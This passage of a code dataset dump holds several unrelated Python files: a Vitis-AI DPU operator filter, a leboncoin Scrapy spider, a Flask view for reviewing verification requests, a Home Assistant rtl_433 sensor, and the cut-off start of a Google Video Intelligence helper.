msg\n \n iw = node.in_tensors[0].shape[2]\n ih = node.in_tensors[0].shape[1]\n\n if not(iw == ksize[0] and ih == ksize[1]):\n ret, msg = check_stride(strides, stride_limit)\n if not ret:\n return ret, msg\n ret, msg = check_load_jump_write(ic, channel_parallel, dilation)\n if not ret:\n return ret, msg\n \n ret, msg = check_save_jump_read(oc, channel_parallel)\n if not ret:\n return ret, msg\n\n if DPUTargetHelper.has_alu_engine(target):\n ret, msg = check_dwconv_weights_bank_depth(target, DPUTargetHelper.get_alu_engine(target), node.op.get_param(node.op.ParamName.WEIGHTS).shape)\n if not ret:\n return ret, msg\n else:\n ret, msg = check_dwconv_weights_bank_depth(target, DPUTargetHelper.get_dwconv_engine(target), node.op.get_param(node.op.ParamName.WEIGHTS).shape)\n 
if not ret:\n return ret, msg\n\n if pad_limit:\n ret, msg = check_pad_with_limit(padding, dilated_ksize, pad_limit)\n if not ret:\n return ret, msg\n else:\n ret, msg = check_pad(padding, dilated_ksize)\n if not ret:\n return ret, msg\n\n # if DPUTargetHelper.has_alu_engine(target):\n # ret, msg = check_nonlinear(DPUTargetHelper.get_alu_engine(target), node)\n # if not ret:\n # return ret, msg\n # else:\n # ret, msg = check_nonlinear(DPUTargetHelper.get_dwconv_engine(target), node)\n # if not ret:\n # return ret, msg\n return True, msg\n\ndef filter_transpose_conv2d(node, target):\n msg = \"\"\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n dilation = node.node_attr(node.op.AttrName.DILATION)\n padding = node.node_attr(node.op.AttrName.PAD)\n\n output_padding = node.node_config(\"output_padding\")\n if any([pad != 0 for pad in output_padding]):\n msg = \"DPU does not support output_padding.\"\n return False, msg\n\n conv_engine = DPUTargetHelper.get_conv_engine(target)\n channel_parallel = conv_engine.input_channel_parallel\n\n ic = node.in_tensors[0].shape[3]\n oc = node.out_tensors[0].shape[3]\n\n kernel_limit = DPUTargetHelper.parse_range(\"1-16\")\n if DPUTargetHelper.has_attr(conv_engine, \"conv_limit\") and conv_engine.conv_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(conv_engine.conv_limit.kernel_size)\n\n ret, msg = check_transposed_kernel(ksize[0], strides[0], kernel_limit)\n if not ret:\n return ret, msg\n ret, msg = check_transposed_kernel(ksize[1], strides[1], kernel_limit)\n if not ret:\n return ret, msg\n\n ret, msg = check_conv_weights_bank_depth(target, conv_engine, node.op.get_param(node.op.ParamName.WEIGHTS).shape)\n\n if not ret:\n return ret, msg\n\n ret, msg = check_load_jump_write(ic, channel_parallel, dilation)\n if not ret:\n return ret, msg\n\n ret, msg = check_save_jump_read(oc, channel_parallel)\n if not ret:\n return ret, msg\n\n ret, msg = check_pad(padding, ksize)\n if not ret:\n return ret, msg\n\n # ret, msg = check_nonlinear(conv_engine, node)\n # if not ret:\n # return ret, msg\n\n return True, msg\n\n\ndef filter_transpose_depthwise_conv2d(node, target):\n msg = \"\"\n ret, msg = check_dwconv_engine(target)\n if not ret:\n return ret, msg\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n padding = node.node_attr(node.op.AttrName.PAD)\n dilation = node.node_attr(node.op.AttrName.DILATION)\n ic = node.in_tensors[0].shape[3]\n oc = node.out_tensors[0].shape[3]\n\n output_padding = node.node_config(\"output_padding\")\n if any([pad != 0 for pad in output_padding]):\n msg = \"DPU does not support output_padding.\"\n return False, msg\n \n kernel_limit = DPUTargetHelper.parse_range(\"1-16\")\n stride_limit = DPUTargetHelper.parse_range(\"1-4\")\n pad_limit = {}\n if DPUTargetHelper.has_alu_engine(target):\n alu_engine = DPUTargetHelper.get_alu_engine(target)\n channel_parallel = alu_engine.channel_parallel\n if DPUTargetHelper.has_attr(alu_engine, \"alu_limit\"):\n alu_limit = alu_engine.alu_limit\n if alu_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(alu_limit.kernel_size)\n if alu_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(alu_limit.stride)\n\n if DPUTargetHelper.has_attr(alu_engine, \"pad_limit\"):\n alu_pad_limit = alu_engine.pad_limit\n if alu_pad_limit.pad_left:\n pad_limit[\"pad_left\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_left)\n if alu_pad_limit.pad_right:\n 
pad_limit[\"pad_right\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_right)\n \n if alu_pad_limit.pad_top:\n pad_limit[\"pad_top\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_top)\n\n if alu_pad_limit.pad_bottom:\n pad_limit[\"pad_bottom\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_bottom)\n else:\n dwconv_engine = DPUTargetHelper.get_dwconv_engine(target)\n channel_parallel = dwconv_engine.channel_parallel\n if DPUTargetHelper.has_attr(dwconv_engine, \"dwconv_limit\"):\n dwconv_limit = dwconv_engine.dwconv_limit\n if dwconv_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(dwconv_limit.kernel_size)\n if dwconv_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(dwconv_limit.stride)\n ret, msg = check_transposed_kernel(ksize[0], strides[0], kernel_limit)\n if not ret:\n return ret, msg\n \n ret, msg = check_transposed_kernel(ksize[1], strides[1], kernel_limit)\n if not ret:\n return ret, msg\n ret, msg = check_stride([1, 1], stride_limit)\n if not ret:\n return ret, msg\n\n ret, msg = check_load_jump_write(ic, channel_parallel, dilation)\n if not ret:\n return ret, msg\n\n ret, msg = check_save_jump_read(oc, channel_parallel)\n\n if pad_limit:\n ret, msg = check_pad_with_limit(padding, ksize, pad_limit)\n if not ret:\n return ret, msg\n else:\n ret, msg = check_pad(padding, ksize)\n if not ret:\n return ret, msg\n\n # if DPUTargetHelper.has_alu_engine(target):\n # ret, msg = check_nonlinear(DPUTargetHelper.get_alu_engine(target), node)\n # if not ret:\n # return ret, msg\n # else:\n # ret, msg = check_nonlinear(DPUTargetHelper.get_dwconv_engine(target), node)\n # if not ret:\n # return ret, msg \n return True, msg\n\ndef filter_conv3d(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) != \"DPUCVDX8G\":\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}. Only DPUCVDX8G support this.\"\n return False, msg\n return True, msg\n\ndef filter_depthwise_conv3d(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) != \"DPUCVDX8G\":\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}. Only DPUCVDX8G support this.\"\n return False, msg\n return True, msg\n\n\ndef filter_transpose_conv3d(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) != \"DPUCVDX8G\":\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}. Only DPUCVDX8G support this.\"\n return False, msg\n\n output_padding = node.node_config(\"output_padding\")\n if any([pad != 0 for pad in output_padding]):\n msg = \"DPU does not support output_padding.\"\n return False, msg\n\n return True, msg\n\n\ndef filter_transpose_depthwise_conv3d(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) != \"DPUCVDX8G\":\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}. 
Only DPUCVDX8G support this.\"\n return False, msg\n \n output_padding = node.node_config(\"output_padding\")\n if any([pad != 0 for pad in output_padding]):\n msg = \"DPU does not support output_padding.\"\n return False, msg\n \n return True, msg\n\n\n\ndef filter_pool(node, target):\n msg = \"\"\n ret, msg = check_pool_engine(target)\n if not ret:\n return ret, msg\n\n avg_pool_type = [NNDCT_OP.AVG_POOL, NNDCT_OP.ADAPTIVEAVGPOOL2D]\n max_pool_type = [NNDCT_OP.MAX_POOL]\n\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n padding = node.node_attr(node.op.AttrName.PAD)\n\n if DPUTargetHelper.has_alu_engine(target):\n alu_engine = DPUTargetHelper.get_alu_engine(target)\n support_list = alu_engine.alu_type\n has_max = any([t == alu_engine.max_pool for t in support_list])\n has_avg = any([t == alu_engine.avg_pool for t in support_list])\n has_max_reduce = any([t == alu_engine.max_reduce for t in support_list])\n else:\n pool_engine = DPUTargetHelper.get_pool_engine(target)\n support_list = pool_engine.pool_type\n has_max = any([t == pool_engine.max for t in support_list])\n has_avg = any([t == pool_engine.avg for t in support_list])\n has_max_reduce = any([t == pool_engine.max_reduce for t in support_list])\n\n if not ((node.op.type in max_pool_type and (has_max or has_max_reduce)) or (node.op.type in avg_pool_type and has_avg)):\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}.\"\n return False, msg\n \n kernel_limit = DPUTargetHelper.parse_range(\"1-8\")\n stride_limit = DPUTargetHelper.parse_range(\"1-8\")\n pad_limit = {}\n if DPUTargetHelper.has_alu_engine(target):\n alu_engine = DPUTargetHelper.get_alu_engine(target)\n if DPUTargetHelper.has_attr(alu_engine, \"alu_limit\"):\n alu_limit = alu_engine.alu_limit\n if alu_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(alu_limit.kernel_size)\n if alu_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(alu_limit.stride)\n\n if DPUTargetHelper.has_attr(alu_engine, \"pad_limit\"):\n alu_pad_limit = alu_engine.pad_limit\n if alu_pad_limit.pad_left:\n pad_limit[\"pad_left\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_left)\n if alu_pad_limit.pad_right:\n pad_limit[\"pad_right\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_right)\n if alu_pad_limit.pad_top:\n pad_limit[\"pad_top\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_top)\n if alu_pad_limit.pad_bottom:\n pad_limit[\"pad_bottom\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_bottom)\n elif node.op.type in avg_pool_type:\n if ksize[0] != ksize[1]:\n msg = f\"DPU only supports avgpool with square kernel, but this op has kernel {ksize[0]} x {ksize[1]}.\"\n return False, msg\n\n pool_engine = DPUTargetHelper.get_pool_engine(target)\n if DPUTargetHelper.has_attr(pool_engine, \"avg_limit\"):\n avg_limit = pool_engine.avg_limit\n if avg_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(avg_limit.kernel_size)\n if avg_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(avg_limit.stride)\n elif node.op.type in max_pool_type:\n pool_engine = DPUTargetHelper.get_pool_engine(target)\n if DPUTargetHelper.has_attr(pool_engine, \"max_limit\"):\n max_limit = pool_engine.max_limit\n if max_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(max_limit.kernel_size)\n if max_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(max_limit.stride)\n \n if node.op.type in max_pool_type and has_max_reduce and ksize[0] not in kernel_limit:\n if ksize[0] > 
100:\n msg = f\"'kernel_width'({ksize[0]}) is not in DPU supported range [1, 100]\"\n return False, msg\n if ksize[1] < 1 or ksizse[1] > 2:\n msg = f\"'kernel_height'({ksize[1]}) is not in DPU supported range [1, 2]\"\n return False, msg\n else:\n ret, msg = check_kernel(ksize, kernel_limit)\n if not ret:\n return ret, msg\n iw = node.in_tensors[0].shape[2]\n ih = node.in_tensors[0].shape[1]\n if iw != ksize[0] or ih != ksize[1]:\n ret, msg = check_stride(strides, stride_limit)\n if not ret:\n return ret, msg\n \n if pad_limit:\n ret, msg = check_pad_with_limit(padding, ksize, pad_limit)\n if not ret:\n return ret, msg\n else:\n ret, msg = check_pad(padding, ksize)\n if not ret:\n return ret, msg\n return True, msg\n\n\ndef filter_eltwise(node, target):\n msg = \"\"\n if node.op.type == NNDCT_OP.MULTIPLY and node.in_tensors[1].node.op.type in [NNDCT_OP.CONST, NNDCT_OP.TENSOR]:\n prefix_msg = \"Try to convert mul to DepthwiseConv2d failed.\"\n ret, check_msg = check_dim_of_inputs_of_mul(node)\n if not ret:\n msg = prefix_msg + check_msg\n else: \n dwconv2d = create_dwconv2d_from_mul(node)\n mul_op = node.op\n node.op = dwconv2d\n input_tensor = node.in_tensors[0] \n out_tensor = node.out_tensors[0]\n old_shape = input_tensor.shape\n new_shape = list(old_shape)\n for i in range(4 - len(old_shape)):\n new_shape.insert(0, 1)\n input_tensor.shape = new_shape\n out_tensor.shape = new_shape\n ret, check_msg = filter_depthwise_conv2d(node, target)\n node.op = mul_op\n input_tensor.shape = old_shape\n out_tensor.shape = old_shape\n if not ret:\n msg = prefix_msg + check_msg\n else:\n return True, msg\n \n ret, check_msg = check_eltwise_engine(target)\n if not ret:\n return ret, msg + check_msg\n eltwise_engine = DPUTargetHelper.get_eltwise_engine(target)\n support_list = eltwise_engine.elew_type\n if node.op.type == NNDCT_OP.ADD:\n has_add = any([t == eltwise_engine.add for t in support_list])\n if not has_add:\n msg = f\"{DPUTargetHelper.get_name(target)} does not support eltwise ADD.\"\n return False, msg\n elif node.op.type == NNDCT_OP.MULTIPLY:\n has_mul = any([t == eltwise_engine.mult for t in support_list])\n if not has_mul:\n msg += f\"{DPUTargetHelper.get_name(target)} does not support eltwise MUL.\"\n return False, msg\n else:\n msg = f\"{DPUTargetHelper.get_name(target)} does not support {node.op.type}.\" \n return False, msg\n \n return True, msg\n\ndef filter_concat(node, target):\n ret = True\n msg = \"\"\n if any([not pn.target_device or pn.target_device.get_device_type() == DeviceType.CPU for pn in node.owning_graph.parents(node)]):\n msg += \"The input of concat is not in DPU subgraph.\"\n dimension = node.out_tensors[0].ndim\n if dimension != 4:\n msg += \"And output dimension is not 4.\"\n ret = False\n else:\n if node.node_attr(node.op.AttrName.AXIS) != 3:\n msg += \"And it's not a channel-wise concatenation.\"\n ret = False\n\n if DPUTargetHelper.get_name(target) == \"DPUCADF8H\":\n dimension = node.out_tensors[0].ndim\n if dimension != 4:\n msg += \"Output dimension is not 4.\"\n ret = False\n else:\n if node.node_attr(node.op.AttrName.AXIS) != 3:\n msg += \"It's not a channel-wise concatenation.\"\n ret = False\n\n return ret, msg\n\n\n\n\ndef filter_upsample(node, target):\n msg = \"\"\n if node.node_attr(node.op.AttrName.MODE) == \"BILINEAR\":\n prefix_msg = \"Try to convert BlinearUpsamle2d to transpose depthwise conv2d failed.\"\n ret, check_msg = check_bilinear_upsample_scale(node)\n if not ret:\n msg = prefix_msg + check_msg\n else:\n transpose_dwconv2d = 
create_transpose_dwconv2d_from_bilinear_upsample(node)\n upsample = node.op\n node.op = transpose_dwconv2d\n ret, check_msg = filter_transpose_depthwise_conv2d(node, target)\n node.op = upsample\n if not ret:\n msg = prefix_msg + check_msg\n else:\n return True, msg\n \n align_corners = node.node_attr(node.op.AttrName.ALIGN_CORNERS)\n if align_corners:\n msg = \"DPU does not support align_corners = True\"\n return False, msg\n\n mode = node.node_attr(node.op.AttrName.MODE)\n if mode == \"BILINEAR\":\n msg += f\"DPU does not support {mode} mode.(only support NEAREST mode).\"\n return ret, msg \n load_engine = DPUTargetHelper.get_load_engine(target)\n channel_parallel = load_engine.channel_parallel\n ic = node.in_tensors[0].shape[3]\n ret, msg = check_load_jump_write(ic, channel_parallel)\n if not ret:\n return ret, msg\n return True, msg\n\ndef filter_reshape(node, target):\n msg = \"\"\n if DPUTargetHelper.get_type(target) == \"DPUCADF8H\":\n return False, msg\n \n input_node = node.owning_graph.parents(node)[0]\n if not (input_node.target_device and input_node.target_device.get_device_type() == DeviceType.DPU):\n return False, msg\n \n return True, msg\n \n\n\ndef filter_pad(node, target):\n msg = \"\"\n mode = node.node_attr(node.op.AttrName.MODE)\n if mode not in [0, 2]: #DPU only support CONSTANT / SYMMETRIC mode\n msg = f\"DPU only support CONSTANT or SYMMETRIC mode.\"\n return False, msg\n \n load_engine = DPUTargetHelper.get_load_engine(target)\n channel_parallel = load_engine.channel_parallel\n ic = node.in_tensors[0].shape[3]\n ret, msg = check_load_jump_write(ic, channel_parallel)\n if not ret:\n return ret, msg\n\n return True, msg\n\ndef filter_hard_sigmoid(node, target):\n msg = \"\"\n if not DPUTargetHelper.has_alu_engine(target):\n msg = \"This target does not support single hard-sigmoid.\"\n return False, msg\n return True, msg\n\n\ndef filter_leaky_relu(node, target):\n msg = \"\"\n alpha = node.node_attr(node.op.AttrName.ALPHA)\n dpu_alpha = 26.0 / 256\n if alpha != dpu_alpha:\n msg = f\"Its alpa is {alpha}, but DPU only support {dpu_alpha}.\"\n return False, msg\n return True, msg\n\n\nfilters = {\n NNDCT_OP.AVG_POOL: filter_pool,\n NNDCT_OP.ADAPTIVEAVGPOOL2D: filter_pool,\n NNDCT_OP.CONVTRANSPOSE2D: filter_transpose_conv2d,\n NNDCT_OP.CONV2D: filter_conv2d,\n # NNDCT_OP.CONCAT: filter_concat, # relax\n NNDCT_OP.DEPTHWISE_CONV2D: filter_depthwise_conv2d,\n NNDCT_OP.ADD: filter_eltwise,\n NNDCT_OP.MULTIPLY: filter_eltwise,\n NNDCT_OP.MAX_POOL: filter_pool,\n NNDCT_OP.PAD: filter_pad,\n NNDCT_OP.CONV3D: filter_conv3d,\n NNDCT_OP.DEPTHWISE_CONV3D: filter_depthwise_conv3d,\n\n NNDCT_OP.RESIZE: filter_upsample,\n # NNDCT_OP.RESIZE_3D: filter_upsample, # relax\n NNDCT_OP.CONVTRANSPOSE3D: filter_transpose_conv3d,\n NNDCT_OP.HSIGMOID: filter_hard_sigmoid,\n NNDCT_OP.HSWISH: filter_hard_sigmoid,\n NNDCT_OP.DEPTHWISE_CONVTRANSPOSE2D: filter_transpose_depthwise_conv2d,\n NNDCT_OP.DEPTHWISE_CONVTRANSPOSE3D: filter_transpose_depthwise_conv3d,\n NNDCT_OP.LEAKY_RELU: filter_leaky_relu\n # append here\n\n}\n\n\ndef merge_permute_to_matmul(graph, target):\n def handler(*args, **kwargs):\n _, node_set = args\n permute_node = node_set[0]\n dense_node = node_set[-1]\n if permute_node.target_device and permute_node.target_device.get_device_type() == DeviceType.DPU:\n return\n if permute_node.node_attr(permute_node.op.AttrName.ORDER) == [0, 3, 1, 2] and dense_node.target_device:\n permute_node.target_device = DeviceInfo(dense_node.target_device.get_device_type())\n 
permute_node.target_device.clear_filter_message()\n\n graph_searcher = GraphSearcher(graph)\n _ = graph_searcher.find_nodes_from_type(\n [PatternType(pattern=[NNDCT_OP.PERMUTE, NNDCT_OP.FLATTEN, NNDCT_OP.DENSE],\n action=handler), \n PatternType(pattern=[NNDCT_OP.PERMUTE, NNDCT_OP.RESHAPE, NNDCT_OP.DENSE], \n action=handler),\n ])\n \ndef filter_dpu_interface_concat(graph, target):\n def handler(*args, **kwargs):\n _, node_set = args\n concat = node_set[0]\n if concat.target_device and concat.target_device.get_device_type() == DeviceType.DPU:\n return\n ret, msg = filter_concat(concat, target)\n if ret:\n concat.target_device = DeviceInfo(DeviceType.DPU)\n concat.target_device.clear_filter_message()\n else:\n concat.target_device = DeviceInfo(DeviceType.CPU)\n concat.target_device.set_filter_message(msg)\n\n graph_searcher = GraphSearcher(graph)\n _ = graph_searcher.find_nodes_from_type(\n [PatternType(pattern=[NNDCT_OP.CONCAT],\n action=handler)])\n\ndef filter_dpu_interface_reshape(graph, target):\n def handler(*args, **kwargs):\n _, node_set = args\n reshape = node_set[0]\n if not (reshape.target_device and reshape.target_device.get_device_type() == DeviceType.DPU):\n return\n input_node = reshape.owning_graph.parents(reshape)[0]\n if input_node.target_device and input_node.target_device.get_device_type() == DeviceType.DPU \\\n and all([cn.target_device and cn.target_device.get_device_type() == DeviceType.DPU for cn in reshape.owning_graph.children(reshape)]):\n # an internal reshape, do nothing\n pass\n else:\n if input_node.out_tensors[0].shape[0] != reshape.out_tensors[0].shape[0]:\n msg = \"First dimension is changed.\"\n reshape.target_device = DeviceInfo(DeviceType.CPU)\n reshape.target_device.set_filter_message(msg)\n\n graph_searcher = GraphSearcher(graph)\n _ = graph_searcher.find_nodes_from_type(\n [PatternType(pattern=[NNDCT_OP.RESHAPE],\n action=handler),\n PatternType(pattern=[NNDCT_OP.FLATTEN],\n action=handler),\n ])\n \ndef check_dim_of_inputs_of_mul(node):\n msg = \"\"\n if_replaceabel = True\n input_shape = node.in_tensors[0].shape\n const_node = node.in_tensors[1].node\n const_data = const_node.node_attr(const_node.op.AttrName.DATA)\n if not isinstance(const_data, list):\n const_data = [const_data]\n const_data = np.array(const_data)\n const_shape = const_data.shape\n\n if_replaceabel = (len(input_shape) <= 4 and \n len(const_shape) == 1 and\n (input_shape[-1] == const_shape[0] or\n const_shape[0] == 1))\n \n if not if_replaceabel:\n msg = f\"mul's input has the tensor dimension {input_shape} and weights has the tensor dimenstion {const_shape}.\"\n return False, msg\n return True, msg\n\ndef create_dwconv2d_from_mul(node):\n dwconv2d = TorchConv2d(NNDCT_OP.DEPTHWISE_CONV2D)\n dwconv2d.set_config('kernel_size', [1, 1])\n dwconv2d.set_config('stride', [1, 1])\n dwconv2d.set_config('padding', [0, 0])\n input_channel = node.in_tensors[0].shape[-1]\n weight_tensor = Tensor(\"weight\")\n weight_tensor.from_ndarray(np.random.randn(1, 1, 1, input_channel))\n dwconv2d.set_param(dwconv2d.ParamName.WEIGHTS, weight_tensor)\n\n return dwconv2d\n\npattern_filters = [merge_permute_to_matmul, filter_dpu_interface_reshape]\n\n\n\n\n","repo_name":"Xilinx/Vitis-AI","sub_path":"src/vai_quantizer/vai_q_pytorch/pytorch_binding/pytorch_nndct/hardware/dpu_op_filter.py","file_name":"dpu_op_filter.py","file_ext":"py","file_size_in_byte":37451,"program_lang":"python","lang":"en","doc_type":"code","stars":1266,"dataset":"github-code","pt":"78"} +{"seq_id":"69802956093","text":"from scrapy.spider 
import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.contrib.loader import XPathItemLoader\nfrom leboncoin.items import LeboncoinItem\n\nfrom scrapy.conf import settings\n\nimport urllib\nfrom urlparse import urlparse, parse_qs\n\n\n\nclass LeboncoinSpider(BaseSpider):\n name = \"leboncoin\"\n allowed_domains = [\"www.leboncoin.fr\"]\n #start_urls = [\n # \"http://www.leboncoin.fr/annonces/offres/nord_pas_de_calais/\"\n #]\n\n start_urls = []\n\n searches = settings['LBC_SEARCHES']\n #categories = settings['LBC_CATEGORIES']\n\n for page in range(1,settings['LBC_DEPTH']):\n for search in searches:\n #for category in categories:\n start_urls.append('http://www.leboncoin.fr/'+urllib.quote(search['category'])+'/offres/nord_pas_de_calais/?q='+urllib.quote(search['search'])+'&o='+str(page))\n\n\n def parse(self, response):\n #filename = response.url.split(\"/\")[-2]\n #open(filename, 'wb').write(response.body)\n hxs = HtmlXPathSelector(response)\n ads = hxs.select('//div[@class=\"list-lbc\"]/a')\n items = []\n def get_first(iterable, default=None):\n if iterable:\n for item in iterable:\n return item\n return default\n for ad in ads:\n item = LeboncoinItem()\n item['id'] = get_first(ad.select('@href').re('(\\d+).htm'))\n item['name'] = get_first(ad.select('div[@class=\"lbc\"]/div[@class=\"detail\"]/div[@class=\"title\"]/text()').re('^\\s*([\\w\\s]+\\w)\\s*'))\n item['photo'] = get_first(ad.select('div[@class=\"lbc\"]/div[@class=\"image\"]/div[@class=\"image-and-nb\"]/img/@src').extract())\n item['url'] = get_first(ad.select('@href').extract())\n item['price'] = get_first(ad.select('div[@class=\"lbc\"]/div[@class=\"detail\"]/div[@class=\"price\"]/text()').re('^\\s*([\\w\\s]+\\w)\\s*'))\n item['placement'] = get_first(ad.select('div[@class=\"lbc\"]/div[@class=\"detail\"]/div[@class=\"placement\"]/text()').re('^\\s*([\\w\\s]+\\w)\\s*'))\n item['category'] = response.url.split(\"/\")[-4] \n # Or use the parse_qs method\n \n query_components = parse_qs(urlparse(response.url).query)\n item['search'] = get_first(query_components[\"q\"] )\n\n #item['search'] = response.url.split(\"/\")[-4] \n items.append(item)\n return items\n","repo_name":"BaQs/lbc","sub_path":"leboncoin/leboncoin/spiders/leboncoin_spider.py","file_name":"leboncoin_spider.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41083766859","text":"from flask import abort, flash, redirect, render_template, url_for\nfrom flask_babel import gettext\nfrom flask_security import auth_required\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom project import app, db\nfrom project.access import (\n access_or_401,\n get_admin_unit_members_with_permission,\n has_access,\n)\nfrom project.forms.verification_request import VerificationRequestReviewForm\nfrom project.models import (\n AdminUnitVerificationRequest,\n AdminUnitVerificationRequestReviewStatus,\n)\nfrom project.services.admin_unit import upsert_admin_unit_relation\nfrom project.views.utils import (\n flash_errors,\n flash_message,\n handleSqlError,\n send_mails_async,\n)\n\n\n@app.route(\"/verification_request/<int:id>/review\", methods=(\"GET\", \"POST\"))\n@auth_required()\ndef admin_unit_verification_request_review(id):\n request = AdminUnitVerificationRequest.query.get_or_404(id)\n access_or_401(request.target_admin_unit, \"verification_request:verify\")\n\n if request.review_status == AdminUnitVerificationRequestReviewStatus.verified:\n flash_message(\n 
gettext(\"Verification request already verified\"),\n url_for(\"organizations\", path=request.source_admin_unit_id),\n gettext(\"View organization\"),\n \"danger\",\n )\n return redirect(\n url_for(\n \"manage_admin_unit_verification_requests_incoming\",\n id=request.target_admin_unit_id,\n )\n )\n\n form = VerificationRequestReviewForm(obj=request)\n\n if form.validate_on_submit():\n form.populate_obj(request)\n\n try:\n if (\n request.review_status\n == AdminUnitVerificationRequestReviewStatus.verified\n ):\n relation = upsert_admin_unit_relation(\n request.target_admin_unit_id, request.source_admin_unit_id\n )\n relation.verify = True\n\n if form.auto_verify.data:\n relation.auto_verify_event_reference_requests = True\n\n msg = gettext(\"Organization successfully verified\")\n else:\n msg = gettext(\"Verification request successfully updated\")\n\n db.session.commit()\n send_verification_request_review_status_mails(request)\n flash(msg, \"success\")\n return redirect(\n url_for(\n \"manage_admin_unit_verification_requests_incoming\",\n id=request.target_admin_unit_id,\n )\n )\n except SQLAlchemyError as e:\n db.session.rollback()\n flash(handleSqlError(e), \"danger\")\n else:\n flash_errors(form)\n\n form.auto_verify.description = gettext(\n \"If all upcoming reference requests of %(admin_unit_name)s should be verified automatically.\",\n admin_unit_name=request.source_admin_unit.name,\n )\n\n return render_template(\n \"verification_request/review.html\",\n form=form,\n request=request,\n )\n\n\n@app.route(\"/verification_request/<int:id>/review_status\")\ndef admin_unit_verification_request_review_status(id):\n request = AdminUnitVerificationRequest.query.get_or_404(id)\n\n if not has_access(\n request.target_admin_unit, \"verification_request:verify\"\n ) and not has_access(request.source_admin_unit, \"verification_request:create\"):\n abort(401)\n\n return render_template(\n \"verification_request/review_status.html\",\n verification_request=request,\n )\n\n\ndef send_verification_request_review_status_mails(request):\n # Benachrichtige alle Mitglieder der AdminUnit, die diesen Request erstellt hatte\n members = get_admin_unit_members_with_permission(\n request.source_admin_unit_id, \"verification_request:create\"\n )\n emails = list(map(lambda member: member.user.email, members))\n\n send_mails_async(\n emails,\n gettext(\"Verification request review status updated\"),\n \"verification_request_review_status_notice\",\n request=request,\n )\n","repo_name":"eventcally/eventcally","sub_path":"project/views/verification_request_review.py","file_name":"verification_request_review.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"31214990694","text":"\"\"\"Sensor platform for rtl_433.\"\"\"\nfrom __future__ import annotations\nimport logging\n\nfrom homeassistant.components.sensor import SensorEntity, SensorEntityDescription\n\nfrom .const import DOMAIN\nfrom .coordinator import Rtl433DataUpdateCoordinator\nfrom .entity import Rtl433Entity\n\n_LOGGER = logging.getLogger(__name__)\n\nENTITY_DESCRIPTIONS = (\n SensorEntityDescription(\n key=\"rtl_433_ha_http\",\n name=\"Integration Sensor\",\n icon=\"mdi:format-quote-close\",\n ),\n)\n\n\nasync def async_setup_entry(hass, entry, async_add_devices):\n \"\"\"Set up the sensor platform.\"\"\"\n coordinator = hass.data[DOMAIN][entry.entry_id]\n async_add_devices(\n Rtl433Sensor(\n coordinator=coordinator,\n 
entity_description=entity_description,\n )\n for entity_description in ENTITY_DESCRIPTIONS\n )\n\n\nclass Rtl433Sensor(Rtl433Entity, SensorEntity):\n \"\"\"rtl_433 Sensor class.\"\"\"\n\n def __init__(\n self,\n coordinator: Rtl433DataUpdateCoordinator,\n entity_description: SensorEntityDescription,\n ) -> None:\n \"\"\"Initialize the sensor class.\"\"\"\n super().__init__(coordinator)\n self.entity_description = entity_description\n\n @property\n def native_value(self) -> str:\n \"\"\"Return the native value of the sensor.\"\"\"\n return self.coordinator.data.get(\"body\")\n\n async def async_update(self):\n \"\"\"Update the sensor.\"\"\"\n try:\n # Fetch new data here, if needed\n # new_data = await self.coordinator.client.async_get_data()\n # Update the native value with the new data\n # self.coordinator.data = new_data\n pass\n except Exception as e:\n _LOGGER.error(f\"Error updating sensor: {e}\")\n","repo_name":"catduckgnaf/rtl_433_ha_http","sub_path":"custom_components/rtl_433/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24244256569","text":"from google.cloud import videointelligence\nfrom google.protobuf.json_format import MessageToDict\nfrom collections import Counter\nimport os\nfrom tenacity import retry, stop_after_attempt, wait_random_exponential\n\n\ndef get_annotations(json_key: str,\n str_bucket: str,\n id_video: str) -> list[dict]:\n bucket = f'gs://{str_bucket}'\n annotations = __mp4_to_annotations(json_key=json_key,\n bucket=bucket,\n id_video=id_video)\n return __annotations_to_dicts(id_video=id_video, annotations=annotations)\n\n\n@retry(stop=stop_after_attempt(1000),\n wait=wait_random_exponential(multiplier=1, max=60))\ndef __mp4_to_annotations(json_key: str,\n bucket: str,\n id_video: str) -> 'list of dict':\n 